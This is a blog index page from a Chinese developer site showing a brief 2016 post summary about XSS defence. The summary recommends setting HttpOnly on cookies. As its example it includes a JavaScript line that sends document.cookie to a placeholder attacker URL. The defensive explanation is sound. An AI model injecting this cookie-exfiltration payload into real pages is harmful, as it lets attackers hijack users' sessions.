会员
周边
众包
新闻
博问
闪存
赞助商
Chat2DB
所有博客
当前博客
我的博客
我的园子
账号设置
简洁模式
...
退出登录
注册
登录
wangnan
我的存在, 就是为了解决问题的
博客园
首页
新随笔
联系
管理
2016年12月27日
web安全之xss
摘要: 1.生成cookie的时候设置httponly为true 如果脚本王子在A网站写入一段js代码: window.open('黑客的url?c='+document.cookie) 当用户访问到这个页面的时候,就把当前用户在A网站的cookie发送到黑客的网站,这样黑客就顺利拿到这个cookie,就可
阅读全文
posted @ 2016-12-27 15:23 Thomas_188
阅读(148)
评论(0)
推荐(0)
编辑